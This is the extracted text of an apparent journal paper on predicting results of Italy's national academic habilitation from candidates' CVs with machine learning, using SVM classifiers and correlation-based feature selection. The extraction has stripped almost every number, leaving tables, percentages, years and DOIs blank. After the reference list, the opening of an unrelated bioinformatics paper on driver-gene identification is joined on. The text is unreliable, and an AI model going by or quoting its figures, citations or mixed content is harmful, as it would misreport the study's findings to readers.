national council of research (cnr). the final outcome of this process is the knowledge graph from which we computed the predictors used in the analyses discussed in the following of this paper. identification of the prediction algorithm in order to implement a supervised learning approach, we needed to create a training set in which the ground truth is obtained from the final reports of the examination committees. the instances of our dataset correspond to the , applications submitted to the asn. for each instance, we collected predictors, of which are numeric and are nominal. the only source of data used to build our dataset is the knowledge graph containing the data extracted from the applicants’ curricula and enriched with external information. the predictors that have been computed belong to one of the following two categories: • numeric and nominal values extracted from the cvs (e.g., the number of publications) or derived from the cvs using external sources (e.g., the number of journal papers has been computed using the publication list in the cvs and querying online databases like scopus); • quantitative values calculated using the values from the previous point. for example, we computed statistical indicators such as the variance of the number of journal papers for each applicant in the last n years. the aforementioned predictors and the habilitation class feature are our starting point to investigate the performances of different machine learning approaches. we decided not to explicitly split the dataset in training and test sets, and systematically rely on cross-fold validation instead. in particular, the data reported in this work are related to the -fold validation, but we have also performed a -fold one with very similar results. the following supervised machine learning algorithms have been tested: • nb: naïve bayes (john & langley, ) • kn: k-nearest neighbours classifier (k chosen using cross validation) (aha, kibler & albert, ) • c : c . decision tree (unpruned) (quinlan, ) • randf: random forest (breiman, ) • svm: support vector machine trained with sequential minimal optimization (keerthi et al., ). poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://cercauniversita.cineca.it/ https://eventi.unibo.it/taste https://eventi.unibo.it/taste http://stlab.istc.cnr.it/stlab/project/semantic-scout/ http://stlab.istc.cnr.it/stlab/project/semantic-scout/ https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance of the machine learning algorithms investigated for the classification of the ap- plicants to the rf /e (level ii). for each algorithm we report precision, recall and f-measure values. precision recall f-measure nb . . . kn . . . c . . . randf . . . svm . . . the rationale behind this choice is to have representatives for the main classification methods that have shown effectiveness in past research. all learners have been tuned using common best practices. svm has been tested with various kernels (in order to account for complex non-linear separating hyperplanes). however, the best results were obtained with a relatively simple polynomial kernel. the parameters for the resulting model have been tuned using the grid method (he & garcia, ). we tested the learners on different data samples obtaining similar results for both bibliometric and non-bibliometric rfs. for example, table shows the results we obtained with these machine learning algorithms for the applicants to the rf /e (level ii). notice that we tested the performances of the learners only with respect to the not qualified class. we do that because we are mainly interested in understanding if we can use machine learning techniques to identify unsuccessful applicants who got not qualified. we are also reporting a limited amount of analysis data, specifically in this work we focus on precision and recall (and the related f-measure). other aspects of the learners (such as the roc curve) have been analyzed in our tests but they were always aligned with the results expressed by the three measures we are providing here. the results show that the best classifiers are those known to perform better on feature-rich datesets. in particular, svm outperforms the other classification methods, and for this reason has been used in the rest of our analyses. feature selection algorithm in this section we describe the technique we used to analyze the relevance of the various predictors for classification purposes. the task consists in identifying a small set of predictors that allows to perform accurate predictions of the asn results (rq ). in case of a large number of predictors, several attribute engineering methods can be applied. the most widely adopted is attribute selection, whose objective is identifying a representative set of attributes from which to construct a classification model for a particular task. the reduction of the number of attributes can help learners that do not perform well with a large number of attributes. this also helps in reducing the computation time needed to create the predictive model. poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. there are two main classes of attribute selection algorithms: those who analyze the performance of the learner in the selection process (i.e., wrappers) and those who do not use the learner (i.e., filters). the first class is usually computationally expensive since the learner runs continuously to check how it performs when changing the attributes in the dataset. that leads to computation times that are two or more orders of magnitude larger compared to the learner itself. for this reason, we did only some limited experiments with learner-aware attribute selection. in our test cases, the results obtained were marginally better than those obtained with processes not using the learner. consequently, we used a filter-based approach in our in-depth analysis. we used correlation-based feature selection (cfs) (hall & holmes, ), which is the first method that evaluates (and hence ranks) subsets of attributes rather than individual attributes. the central hypothesis of this approach is that good attribute sets contain attributes that are highly correlated with the class, yet uncorrelated with each other. at the heart of the algorithm is a subset evaluation heuristic that takes into account the usefulness of individual attributes for predicting the class along with the level of intercorrelation among them. the aforementioned technique has been used in the analysis presented in ‘‘analysis of the quantitative indicators of applicants’’. results the aim of the analyses presented in this section is to answer the two research questions (rqs) discussed in ‘‘introduction’’. given the huge amount of data provided by the curricula of the applicants, we want to understand if machine learning techniques can be used to effectively distinguish between candidates who got the habilitation and those who did not (rq ). we are also interested in identifying a small set of predictors that can be used to perform accurate predictions for the different rfs and scientific levels of the asn (rq ). we conclude this section with an assessment of the predictive power of our approach, in which we compare our best models with those that have been proposed in the literature to solve similar problems. analysis of the recruitment fields and areas the objective of the first experiment is to predict the results of the asn (rq ). we used svm, which is the best machine learning algorithm emerged from the tests discussed in ‘‘identification of the prediction algorithm’’. we classified our dataset with respect to the class of candidates who got the habilitation using the svm learner. we first split the dataset into two partitions containing the data about candidates for level i and level ii, respectively. for each partition, we classified separately the applicants of each rf. the results of our analysis are published in poggi et al. ( a), and are summarized by the boxplots in fig. . the boxplot is a method for graphically depicting the distribution of data through their quartiles. the central rectangle spans the first quartile to the third quartile. the segment inside the rectangle shows the median, and ‘‘whiskers’’ above and below the box show the locations of the minimum and maximum. from these results, we observe that the performance of the learners for bibliometric and non-bibliometric rfs are very similar, and that they are distributed evenly (i.e., there is not poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure boxplots depicting the performance of the svm algorithm for academic level i and ii. preci- sion, recall and f-measure values are reported for bibliometric (a, c) and non-bibliometric (b, d) rfs. full-size doi: . /peerjcs. /fig- a polarization of bibliometric and non-bibliometric rfs). moreover, we note that / ( . %) and / ( %) rfs have f-measure scores higher than . for professional level i and ii, respectively. we also investigated the performance of the svm learner on the data partitioned in the scientific areas in which rfs are organized. to do so, we split the dataset into partitions: poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nine for bibliometric sas ( - ), one for the macro sector /e (psicology) which is bibliometric, five for non-bibliometric sas ( - ), and one for the rfs /c , /d , /e , /e and /f which are non-bibliometric. the results for both professional levels are summarized in fig. , and the whole data are reported in poggi et al. ( a). also in this case, results are very accurate for both bibliometric and non-bibliometric disciplines, with f-measure scores spanning from a minimum of . ( -avm) and . ( -phy) for professionals level i and ii, and a maximum of . ( -hpp) and . ( -pss) for professional levels i and ii. we observe that, at the associate professor level, the performance for non-bibliometric sas (fig. d) are significantly better than for bibliometric sas (fig. c). moreover, the variance of the values is much lower for non-bibliometric sas, as showed by the boxplots which are significantly more compressed. analysis of the quantitative indicators of applicants the objective of the next experiment is to identify a small set of predictors that allows to perform accurate predictions of the asn results (rq ). to this end, we analyzed the relevance of the various predictors for classification purposes using the cfs algorithm described in ‘‘feature selection algorithm’’. the first step of our investigation consists of splitting our training set into partitions corresponding to the two professional levels of the asn, and running the cfs filters on the data of each rf. we then produced a ranking of the selected predictors by counting the occurrences of each of them in the results of the previous computation. figure reports the top predictors for the two professional levels considered. we used the best overall learner emerged from the aforementioned tests (i.e., svm) and applied it, for each academic level and rf, considering the top predictors. the results of our analysis on the rfs are summarized in fig. , and the whole data are reported in poggi et al. ( a). we observe that there has been a slight improvement in performances if compared to those obtained using all the predictors: / ( %) and / ( . %) rfs have f-measure scores higher than . for professional level i and ii, respectively. moreover, also in this case, the results for bibliometric and non-bibliometric rfs are similar. an analysis of the indicators selected as top predictors is presented in ‘discussion’. evaluation in order to assess the predictive power of our approach, in this section we compare our best models with those that have been proposed in the literature to solve similar problems. as discussed in ‘‘related work’’, three works are particularly relevant for this task: vieira’s model ( a) based on rank ordered regression, jensen’s binomial regression model ( ), and the models developed by tregellas et al. ( ). a first analysis can be performed comparing the information summarized in table about the sizes of the datasets and the scopes of these works with our investigation. by considering the number of authors and papers, we observe that our dataset is some orders of magnitude greater than the others: i.e., , authors (our work) vs. (vieira), , poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure boxplots depicting the performance of the svm algorithm for academic level i and ii. preci- sion, recall and f-measure values are reported for bibliometric (a, c) and non-bibliometric (b, d) sas. full-size doi: . /peerjcs. /fig- (jensen) and (tregellas) authors; , , papers (our work) vs. , papers (vieira). we also remark that vieira’s ( a) and tregellas’s ( ) work are limited to very small samples of researchers from portugal and the united states, while our and jensen’s works analyze a nationwide population. moreover, while the other works focused on a limited set of indicators (vieira’s ( a) model is based on three indicators, jensen’s ( ) on eight and tregellas’s ( ) on ten), we extracted a richer set of indicators from candidates’ cvs ( predictors). we also observe that, while our work and jensen’s ( ) cover all the disciplines, vieira ( a) limits the analysis to seven disciplines in hard sciences, and poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure top predictors selected by the cfs filter for professional level i (a) and ii (b). the x-axis shows how many times the predictors have been chosen by the cfs algorithm. full-size doi: . /peerjcs. /fig- tregellas ( ) to biomedical sciences. overall, our dataset is very wide and rich, and less exposed to issues (e.g., biases) than those used in the other three works. in order to evaluate the predictive power of our approach, we have to compare its performances with those of the aforementioned works. for this purpose, all the proposed predictive models must be tested on the same data. since none of the datasets used in the considered works are freely available, we decided to test the models on representative samples extracted from our dataset, and compare the results with our approach. the first model proposed by vieira ( a) is based on a composite predictor that encompasses standard bibliometric indicators and that is obtained through factor analysis. unfortunately, the authors don’t provide a definition of such composite predictor, nor they discuss the details on how it has been computed. given the lack of such information, we observed that is impossible to replicate the model and decided to exclude vieira’s ( a) model from this experiment. jensen’s ( ) model is a binomial regression model based on eight indicators: h, hy, number of publications and citations, mean citations/paper, h/number of papers, age and gender. we decided to focus this analysis on the applicants to the associate professor level for two rfs: informatics ( /b ) and economics ( /a ). these two rfs have been chosen as representatives of bibliometric and non-bibliometric recruitments fields because they best meet two important criteria: (i) they received a very high number of applications; (ii) the two populations (i.e., those who attained the habilitation and those who did not attained it) are well balanced. for the same poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure boxplots depicting the performance of the svm algorithm for academic level i and ii using the top predictors. precision, recall and f-measure values are reported for bibliometric (a, c) and non-bibliometric (b, d) rfs. full-size doi: . /peerjcs. /fig- reason we also considered the sas ‘‘mathematics and computer science’’ (mcs- , bibliometric) and ‘‘economics and statistics’’ (ecs- , non-bibliometric). in this way we are able to assess the predictive power of the models at different levels of granularity, both for bibliometric and non-bibliometric rfs and sas. since the indicators used by jensen’s ( ) models that were not present in our dataset (i.e., mean citations/paper, h/number of papers) could be derived from our data, we computed and added them to poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of the performances of our models (our-svm) with jensen’s ( ) models using eight predictors (j-log ) and one pre- dictor (j-log ). best precision, recall and f-measure values are in bold. field/ precision recall f-measure area j-log j-log our-svm j-log j-log our-svm j-log j-log our-svm /b . . . . . . . . . /a . . . . . . . . . mcs- . . . . . . . . . ecs- . . . . . . . . . the test dataset. we then built the regression models using the aforementioned eight indicators and, as suggested by the authors, we also repeated the experiment using only the h-index, which has been identified as the one with the highest relevance. the results obtained by jensen’s ( ) models and our models are reported in table . the results show that our approach outperforms jensen’s regression models in all the considered rfs and sas. the only exception is the recall value of the regression model based on the only h-index (log ) for the mcs- area. however, we report that the relative f-measure, which is a measure of the overall model accuracy, is much lower than our model. this can be explained by considering the low model precision, which is probably caused by an high number of false positives. by comparing the f-measure values of the models we also observe that the regression models have the worst performances in non-bibliometric fields and areas (i.e., rf /a and sa ecs- ). the main reason is that the quantitative indicators used by the jensen’s ( ) models, which are mostly bibliometric, do not provide enough information for performing accurate predictions for non-bibliometric disciplines. in contrast, our approach is more stable, and leads to similar results in all rfs and sas. the ability of our model to manage the variability of the different disciplines can be explained by the richness of the dataset on which the model is based. we also compared the performance of our approach with tregellas et al.’s ( ) two best models based on three indicators: sex, date of graduation, and number of first-author papers. as in the previous experiment, we decided to perform the test on two rfs, one bibliometric and one non-bibliometric, following the aforementioned criteria. as representative of bibliometric rfs we chose ‘‘molecular biology’’ ( /e ) since tregellas et al.’s ( ) work focused on the biomedical domain, and ‘‘economics’’ ( /a ) as representative of non-bibliometric rfs (as in the previous experiment). two out of the three indicators used by tregella’s models were not present in our dataset: number of first-author papers and date of graduation. while the first indicator can be easily computed using the publication list in the candidates’ cvs, the latter (i.e., date of graduation) has to be gathered from external sources. unfortunately, no freely-available database contains this information. we then had to search the web for authoritative sources (such as professional cvs, personal web pages, etc.) and manually process them to find information about the candidates’ education. for this reason, we decided to focus our analysis on a sample of randomly selected candidates for each of the considered rf. the output test dataset has poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of the performances of our model (our-svm) with tregellas et al.’s ( ) two best models based on linear regression (t-lr) and support vector machines (t-svm). best precision, recall and f-measure values are in bold. field precision recall f-measure t-lr t-svm our-svm t-lr t-svm our-svm t-lr t-svm our-svm /e . . . . . . . . . /a . . . . . . . . . been used for our experiment. the results of our model and tregellas et al.’s ( ) models based on linear regression and svm classifiers are reported in table . the results show that overall our approach outperforms tregella’s models. also in this case there is an exception: the recall value of tregella’s model based on svms in rf /e . however, by analyzing the relative f-measure, we note that tregella’s overall model accuracy is lower than our model: . for tregella’s svm-based model, and . for our model. this is caused by the high number of false positives produced by tregella’s predictive model, which consequently results in lower precision and f-measure values compared to our model. by comparing the f-measure values of the models we observe that tregella’s models have very low performances in the non-bibliometric rf ( /a ). we also note that, even considering the specific discipline for which tregella’s models have been designed for (i.e., rf /e - ‘‘molecular biology’’, which is a discipline in the the biomedical domain), our model has better performances than two tregella’s regression models. this confirms that our approach is more stable and general, being able to perform accurate predictions in very different rfs and disciplines. as discussed in the previous experiment, the ability of our models to manage the variability and specificity of different disciplines can be explained by the richness of the features in our datasets, which have been automatically extracted from candidates’ cvs, and that are fundamental to accurately predict the result of complex human processes (such as evaluation procedures). discussion this research has been driven by the two research questions described in the introduction, and that can be summarized as follows: • rq : is it possible to predict the results of the asn using only the information contained in the candidates’ cvs? • rq : is it possible to identify a small set of predictors that can be used to predict the asn results? the analyses presented in ‘results’ show that machine learning techniques can successfully resolve the binary classification problem of discerning between candidates that attained the habilitation and those who did not on the base of the huge amount of quantitative data extracted from applicants’ cvs with a good accuracy. in fact, the results of the experiments for rq have f-measure values higher . in / ( . %) rfs and in / ( %) rfs for academic levels i and ii, respectively. moreover, the performances poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. are very similar and uniform for both bibliometric and non-bibliometric disciplines, and do not show a polarization of the results for the two classes of disciplines. through an attribute selection process we identified top predictors, and the prediction models based on such predictors resulted to have f-measure values higher than . in / ( %) rfs and / ( . %) rfs for academic levels i and ii, respectively (rq ). also in this case, the results are uniform and equally distributed among bibliometric and non-bibliometric disciplines. some interesting considerations can be made by analyzing and comparing the top predictors for the two academic levels (i.e., associate and full professor). first of all we remark that, as is obvious, many standard bibliometric indicators have been identified as relevant. in particular, seven of them are shared by both associate and full professor levels: the number of publications with impact factor since ever (pub_if_all) and since (pub_if_y ), the number of publications with category (publication_with_category), the cumulative impact factor since ever (if_all) and in - (if_y ), and the number of journal papers since ever (journal) and since (journal_y ) - see fig. . however, we note that the first predictor (i.e., the one selected by the feature selection algorithm for most of the rfs) for both levels is y_affiliation_same (i.e., the maximum number of years with affiliation to the same university). this is a non-bibliometric indicator which has not been considered by any of the papers reviewed in the ‘related work’. we note that this result is coherent with the italian model of academic careers, which is typically linear and inbreeding-based, meaning that most academics use to stay in the same university from basic studies up to the research career (aittola et al., ). we plan to further investigate the correlation between working for the same institutions and the success to the asn, and to analyze if there are differences among disciplines. we also remark that there are interesting observations that concern each of the two levels and highlight peculiar aspects of each of them. for instance, we note that the year of birth (born_y) is among the top predictors for associate professors and not for full professor, suggesting that the age may be a relevant feature for the success at the beginning of an italian scholar’s career. this result is analogous to the one presented in tregellas et al. ( ), in which a similar indicator (i.e., the date of graduation) is used for predicting career outcomes of young researchers. conversely, years_no_pub (i.e., the number of years in which no papers written by the candidate has been published) is a relevant predictor for full professor and not for associate professor. an explanation of this fact is that evaluation committees may have considered continuity in publications as a relevant factor in the evaluation of candidates to the full professor level (e.g., for discerning between candidates who have been active throughout their careers, and those who have not always been productive). also, in this case, we plan to perform a deeper analysis of this point as future work. an evaluation of the predictive power of our approach has been performed by comparing the results of our models with the best models that have been proposed in the literature to predict academic promotions. the comparison shows that our model outperforms jensens’ ( ) binomial regression models and tregella’s models on both bibliometric and non- bibliometric disciplines. this outcome proves that it is possible to predict with a good poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. accuracy the results of complex human processes such as peer-review assessments through computational methods. moreover, the performance difference between the approaches is more evident for non-bibliometric disciplines. we observe that the outperformances of our results (overall and for non-bibliometric disciplines) are a straight consequence of the richness and quality of the predictors extracted form candidates’ cvs. an explanation is that models which are mostly based on bibliometric indicators are not able to fully catch and explain all the different factors (e.g., cultural, social, contextual, scientific, etc.) that play a key role in peer-review evaluation processes. conclusions the results of this work are encouraging. we remark that the final goal of our work is not substituting evaluation committees by algorithms, but providing tools for supporting candidates, evaluators and policy makers involved in complex assessment processes such as the asn. a candidate may use our system to self-evaluate his/her cv. committee members could evaluate the consistency of their decisions across different evaluation sessions. in case of an appeal by rejected candidates to a higher panel, the panel itself could exploit our approach to analyze anomalies. our system could also be useful for a foreign scholar who could get insight about how his cv is competitive against the italian benchmarks. also, policy makers could benefit from a system based on machine learning techniques such as the one presented in this paper in their decisions. at the local level, department heads and university presidents may evaluate people to recruit by guessing if they would be habilitated, since there are incentives. at the national level, the government may consider the results of our analysis to simplify the evaluation process. for instance, it could reduce the paperwork focusing on factors we identified as more relevant. moreover, as already discussed, our approach would help committee members to minimize anomalies in their decisions. this would have the benefit of minimizing the number of requests of reviews and appeals, saving the time of both academic and administrative staff. future directions of this research line consists in extending our analysis to more recent sessions of the asn, and to analyze the impact of mobility on the career of academics. it would also be interesting to consider the applicants that have not been correctly classified by the learner in order to improve the approach and also have a more precise understanding of the factors that have been more relevant for assessments of academics performed by humans such as the asn. acknowledgements we thank andrea bonaccorsi (university of pisa) and riccardo fini (university of bologna), who provided important considerations and discussions on this work. we would also thank the reviewers for their insightful comments. poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this research has been supported by the italian national agency for the assessment of universities and research (anvur) within the uniform representation of curricular attributes (urca) project (see articolo of the ‘concorso pubblico di idee di ricerca’ - bando anvur, february ). paolo ciancarini was also supported by cini (enav project) and by cnr-istc. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: italian national agency for the assessment of universities and research (anvur). cini (enav project). cnr-istc. competing interests silvio peroni is an academic editor for peerj computer science. author contributions • francesco poggi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. francesco poggi is the main contributor of this work and the principal investigator of the project urca that supported the research presented in this paper. • paolo ciancarini and silvio peroni authored or reviewed drafts of the paper, approved the final draft. • aldo gangemi analyzed the data, authored or reviewed drafts of the paper. • andrea giovanni nuzzolese and valentina presutti authored or reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the following github repository contains raw data and code: https://github.com/sosgang/asn -analysis. the data/input/ folder contains the input data, and the data/output/ folder contains the output data of the analyses and experiments. the src/ folder contains the java source code used to perform the analyses and experiments discussed in the paper. the target folder contains a packaged runnable jar to execute the analyses/experiments. poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sosgang/asn -analysis http://dx.doi.org/ . /peerj-cs. references abramo g, d’angelo ca, caprasecca a. . allocative efficiency in public research funding: can bibliometrics help? research policy ( ): – doi . /j.respol. . . . aha dw, kibler d, albert mk. . instance-based learning algorithms. machine learning ( ): – doi . /a: . aittola h, kiviniemi u, honkimäki s, muhonen r, huusko m, ursin j. . the bologna process and internationalization—consequences for italian academic life. higher education in europe ( – ): – doi . / . aksnes d. . a macro study of self-citation. scientometrics ( ): – doi . /a: . bornmann l. . how to analyze percentile citation impact data meaningfully in bibliometrics: the statistical analysis of distributions, percentile rank classes, and top-cited papers. journal of the association for information science and technology ( ): – doi . /asi. . bornmann l, daniel h-d. . selecting scientific excellence through committee peer review—a citation analysis of publications previously published to approval or rejec- tion of post-doctoral research fellowship applicants. scientometrics ( ): – doi . /s - - - . bornmann l, daniel h-d. . convergent validation of peer review decisions using the h index: extent of and reasons for type i and type ii errors. journal of informetrics ( ): – doi . /j.joi. . . . bornmann l, haunschild r. . do altmetrics correlate with the quality of papers? a large-scale empirical study based on f prime data. plos one ( ):e doi . /journal.pone. . bornmann l, wallon g, ledin a. . does the committee peer review select the best applicants for funding? an investigation of the selection process for two european molecular biology organization programmes. plos one ( ):e doi . /journal.pone. . breiman l. . random forests. machine learning ( ): – doi . /a: . cronin b, meho l. . using the h-index to rank influential information scientists. journal of the association for information science and technology ( ): – doi . /asi. . danell r. . can the quality of scientific work be predicted using information on the author’s track record? journal of the association for information science and technology ( ): – doi . /asi. . di iorio a, peroni s, poggi f. . open data to evaluate academic researchers: an experiment with the italian scientific habilitation. in: issi - th international conference on scientometrics and informetrics, conference proceedings. poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.respol. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . /asi. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /a: http://dx.doi.org/ . /asi. http://dx.doi.org/ . /asi. http://dx.doi.org/ . /peerj-cs. franceschet m. . a cluster analysis of scholar and journal bibliometric indicators. journal of the association for information science and technology ( ): – doi . /asi. . franceschet m, costantini a. . the first italian research assessment exercise: a bibliometric perspective. journal of informetrics ( ): – doi . /j.joi. . . . fu ld, aliferis cf. . using content-based and bibliometric features for machine learning models to predict citation counts in the biomedical literature. scientometrics ( ): – doi . /s - - - . hall ma, holmes g. . benchmarking attribute selection techniques for dis- crete class data mining. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . he h, garcia ea. . learning from imbalanced data. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . ibáñez a, armañanzas r, bielza c, larrañaga p. . genetic algorithms and gaussian bayesian networks to uncover the predictive core set of bibliometric indices. journal of the association for information science and technology ( ): – doi . /asi. . jensen p, rouquier j-b, croissant y. . testing bibliometric indicators by their prediction of scientists promotions. scientometrics ( ): – doi . /s - - - . john gh, langley p. . estimating continuous distributions in bayesian classifiers. in: proc. th conference on uncertainty in artificial intelligence. burlington: morgan kaufmann, – . keerthi ss, shevade sk, bhattacharyya c, murthy krk. . improvements to platt’s smo algorithm for svm classifier design. neural computation ( ): – doi . / . law. . rules concerning the organization of the universities, academic employees and recruitment procedures, empowering the government to foster the quality and efficiency of the university system (norme in materia di organizzazione delle università, di personale accademico e reclutamento, nonche’ delega al governo per incentivare la qualità e l’efficienza del sistema universitario), gazzetta ufficiale n. del gennaio - suppl. ordinario n. . available at http://www. gazzettaufficiale.it/eli/id/ / / / g /sg (accessed on march ). leydesdorff l. . how are new citation-based journal indicators adding to the bib- liometric toolbox? journal of the association for information science and technology ( ): – doi . /asi. . lindahl j. . predicting research excellence at the individual level: the impor- tance of publication rate, top journal publications, and top % publications in the case of early career mathematicians. journal of informetrics ( ): – doi . /j.joi. . . . marzolla m. . quantitative analysis of the italian national scientific qualification. journal of informetrics ( ): – doi . /j.joi. . . . poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asi. http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://www.gazzettaufficiale.it/eli/id/ / / / g /sg http://www.gazzettaufficiale.it/eli/id/ / / / g /sg http://dx.doi.org/ . /asi. http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /peerj-cs. ministerial decree . . redefinition of scientific disciplines (rideterminazione dei settori concorsuali), gazzetta ufficiale serie generale n. del - - —suppl. ordinario n. ). available at http://www.gazzettaufficiale.it/eli/id/ / / / a /sg (accessed on march ). nederhof aj, van raan af. . peer review and bibliometric indicators of scientific performance: a comparison of cum laude doctorates with ordinary doctorates in physics. scientometrics ( – ): – doi . /bf . norris m, oppenheim c. . citation counts and the research assessment exercise v: archaeology and the rae. journal of documentation ( ): – doi . / . nuzzolese ag, ciancarini p, gangemi a, peroni s, poggi f, presutti v. . do altmetrics work for assessing research quality? scientometrics ( ): – doi . /s - - -z. peroni s, ciancarini p, gangemi a, nuzzolese ag, poggi f, presutti v. . the practice of self-citations: a longitudinal study. arxiv preprint. arxiv: . (accessed on march ). poggi f, ciancarini p, gangemi a, nuzzolese ag, peroni s, presutti v. a. pre- dicting the results of evaluation procedures of academics: additional materials. doi . /m .figshare. . poggi f, ciancarini p, gangemi a, nuzzolese ag, peroni s, presutti v. b. predicting the results of evaluation procedures of academics: appendices. doi . /m .figshare. . poggi f, cigna g, nuzzolese ag. . enhancing open data to linked open data with odminer. in: ld ie@iswc. – . available at http://ceur-ws.org/vol- /paper- .pdf (accessed on march ). quinlan jr. . c . : programs for machine learning. san mateo: elsevier. taylor j. . the assessment of research quality in uk universities: peer review or metrics? british journal of management ( ): – doi . /j. - . . .x. tregellas jr, smucny j, rojas dc, legget kt. . predicting academic career out- comes by predoctoral publication record. peerj :e doi . /peerj. . van raan af. . comparison of the hirsch-index with standard bibliometric indicators and with peer judgment for chemistry research groups. scientometrics ( ): – doi . /scient. . . . . vieira es, cabral ja, gomes ja. a. definition of a model based on bibliometric indicators for assessing applicants to academic positions. journal of the association for information science and technology ( ): – doi . /asi. . vieira es, cabral ja, gomes ja. b. how good is a model based on bibliometric indicators in predicting the final decisions made by peers? journal of informetrics ( ): – doi . /j.joi. . . . w c owl working group. . owl web ontology language. available at https: //www.w .org/tr/owl -overview/ (accessed on march ). poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.gazzettaufficiale.it/eli/id/ / / / a /sg http://www.gazzettaufficiale.it/eli/id/ / / / a /sg http://dx.doi.org/ . /bf http://dx.doi.org/ . / http://dx.doi.org/ . /s - - -z http://arxiv.org/abs/ . http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://ceur-ws.org/vol- /paper- .pdf http://ceur-ws.org/vol- /paper- .pdf http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /scient. . . . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /j.joi. . . https://www.w .org/tr/owl -overview/ https://www.w .org/tr/owl -overview/ http://dx.doi.org/ . /peerj-cs. wouters p, thelwall m, kousha k, waltman l, de rijcke s, rushforth a, franssen t. . the metric tide: correlation analysis of ref scores and metrics (supplementary report ii to the independent review of the role of metrics in research assessment and management). london: higher education funding council for england (hefce) doi . /rg. . . . . poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /rg. . . . http://dx.doi.org/ . /peerj-cs. dgpathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways dgpathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways jianing xi ,*, minghui wang , ,* and ao li , school of information science and technology, university of science and technology of china, hefei, china centers for biomedical engineering, university of science and technology of china, hefei, china * these authors contributed equally to this work. abstract cataloging mutated driver genes that confer a selective growth advantage for tumor cells from sporadic passenger mutations is a critical problem in cancer genomic research. previous studies have reported that some driver genes are not highly frequently mutated and cannot be tested as statistically significant, which complicates the identification of driver genes. to address this issue, some existing approaches incorporate prior knowledge from an interactome to detect driver genes which may be dysregulated by interaction network context. however, altered operations of many pathways in cancer progression have been frequently observed, and prior knowledge from pathways is not exploited in the driver gene identification task. in this paper, we introduce a driver gene prioritization method called driver gene identification through pathway and interactome information (dgpathinter), which is based on knowledge-based matrix factorization model with prior knowledge from both interactome and pathways incorporated. when dgpathinter is applied on somatic mutation datasets of three types of cancers and evaluated by known driver genes, the prioritizing performances of dgpathinter are better than the existing interactome driven methods. the top ranked genes detected by dgpathinter are also significantly enriched for known driver genes. moreover, most of the top ranked scored pathways given by dgpathinter are also cancer progression- associated pathways. these results suggest that dgpathinter is a useful tool to identify potential driver genes. subjects bioinformatics, computational biology keywords matrix factorization, prior knowledge, bioinformatics, data mining introduction in the last decade, studies based on advanced dna sequencing technologies have highlighted the fact that the development and progression of cancer hinges on somatic abnormalities of dna (hudson et al., ; vogelstein et al., ; raphael et al., ). despite a small number of driver genes conferring a selective growth advantage for tumor cells, a considerable number of somatic mutations are sporadic passenger mutations that have no impact on cancer process (sjöblom et al., ; youn & simon, ; how to cite this article xi et al. ( ), dgpathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways. peerj comput. sci. :e ; doi . /peerj-cs. submitted july accepted september published october corresponding author ao li, aoli@ustc.edu.cn academic editor jaume bacardit additional information and declarations can be found on page doi . /peerj-cs. copyright xi et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:aoli@�ustc.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. 